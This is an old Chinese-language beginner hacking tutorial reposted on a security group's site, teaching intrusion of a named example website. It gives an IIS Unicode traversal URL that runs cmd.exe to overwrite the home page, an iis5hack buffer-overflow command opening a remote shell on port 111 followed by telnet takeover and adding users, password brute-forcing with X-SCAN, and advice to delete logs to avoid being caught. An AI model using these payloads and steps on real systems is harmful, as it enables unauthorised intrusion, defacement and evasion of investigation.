|
初级黑客教学 (阅览
次)
各位老大//// 本文纯属个人见解 //// 如有不满竟请见谅
qq :249395079 emil:lovewxll@eyou.com
1. 扫端口(port)
port是一个很重要的东西,如果你知道他所有有开的port的话,那你就可以从某个port开始hacking.
22 SSH 爽拉
21 FTP重要哦
23 TELNET赚到拉
25 STMP没啥用ㄋㄟ
53 DOMAIN... 不想说了
80HTTP看网页用的拉
110POP收信的(要破E-MAIL吗?)
139 NETBOIS暴重要的!!!
3389win2000超级终端,最爽的一个
2. 破密码(password)
大部分的密码文件不是很好,不过有些很好<== 文件超大的,不过勉强可用,<== 可以自己加欧!
3. 万国码(UNICODE)
虽然很老了,不过还是有很多主机都有UNICODE的BUG. 像是韩国的,一堆, 大陆的呢? 少之又少,因为怕被HACK,所以都有补
4. 烘培鸡(FRONTPAGE)
很多人都以为说装的FRONTPAGE EXTEND,可以让网页变好,但是像很多HACKER,可以直接用FRONTPAGE直接改网页.
讲了那麽多,终於要开始来玩了<== 爽爽爽
首先要先挑一苹肥肥嫩嫩的来玩,就先玩 http://www.newhacker.com/ 吧(随便举例)
要先找到他的IP欧,所以呢,请到CMD来PING它吧
C:\>ping www.newhacker.com
Pinging www.newhacker.com [255.255.255.255] with 32 bytes of data:
Reply from 255.255.255.255: bytes=32 time=183ms TTL=238 ┅
阿他的IP不小心的被我PING出来了ㄟ
先扫扫看他的PORT 22 SSH,21 FTP,25 TELNET,53 DOMAIN,80 HTTP,110 POP,139 NETBOIS,3389 WIN2000 终端机 ┅ 真多PORT阿
改主页
请先拿出 X-SCAN 2.2 哈哈哈,他要死了,来扫unicode.
范例: http://www.newhacker.com/scripts ... /system32/cmd.exe?/
c+dir 哇,他的硬盘的东西都秀出来了欧. 来改他的主页,那先找到他的路径吧,请 dir 所有的文件夹来找吧,哈,他的路径是c:\inetpub\wwwroot\index.html
http://www.newhacker.com/scripts/..%c1%1c../winnt/system32/cmd”.exe?/c+echo+hackedbytaiwan+>c:\inetpub\wwwroot\index.html
cgi错误, 不用里他,现在到主页去看看.爽爽爽,我的名称被贴上去了,哈哈哈.
还有,要记的删除纪录欧,不然被抓我可不管欧.
IIS 溢出
据说缓冲区溢出攻击是黑客入侵时70%所选的方法,看起来有点夸张,但确实有道理,因为暴力密码破解在网络上变得非常之慢,而像unicode的解码漏洞所取得的权限又太低,而缓冲区溢出一般可取得system权限,是非常有用的!
具体原理我也不是很清楚,只能说个大概∶当我们向系统发出超出缓冲区大小的数据处理请求时,便会引发溢出,并弹出错误对话框,我们常看到的「非法操作」其实也是可能是由於溢出。而当溢出时,eip发生错误,有汇编知识的朋友应该记得,eip是控制执行代码的位置(顺便问一下,有没有会crack的高人,记得做我老师)这时加入一段恶性代码,算好发生溢出时的eip值,这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了,因此┅┅溢出攻击是非常强大的!
由於汇编对於我们来说较难掌握,加之对溢出的了解很有限,那麽我们只能借助高手们的程序来黑了。
具体方法∶
1,准备iishack,不要跟我要,该版本可以对多种系统进行攻击。
2,用x-scan或流光扫瞄一个有iis.printer漏洞的主机,然後就可以攻击了。
3,在命令行方式执行iis5hack (主机ip) (端口号,默认80)(系统代号,具体可参考程序的帮助) ( shell口)
例如∶iis5hack 255.255.255.255 80 1 111(以为在111端口开一个shell)
4,用telnet连上,telnet 255.255.255.255 111,成功的话就可以控制机器了,加个用户,做个代理┅┅
密码暴力破解
最好用的就是X-SCAN了,速度快,不过就是密码文件太滥了,有空的话可以自己加
设置一番,上路吧!你可以睡觉,可以去machine(就是做作业),可以去读书┅┅就是不要傻等。为什麽呢?因为会伤视力的∶)
各位老大//// 本文纯属个人见解 //// 如有不满竟请见谅
qq :249395079 emil:lovewxll@eyou.com
===============================================
本文版权属20CN网络安全小组及其作者所有,如有转载,请保持文章完整性并注明出处
文章类型:原创 提交:小琪 核查:NetDemon
返回
|
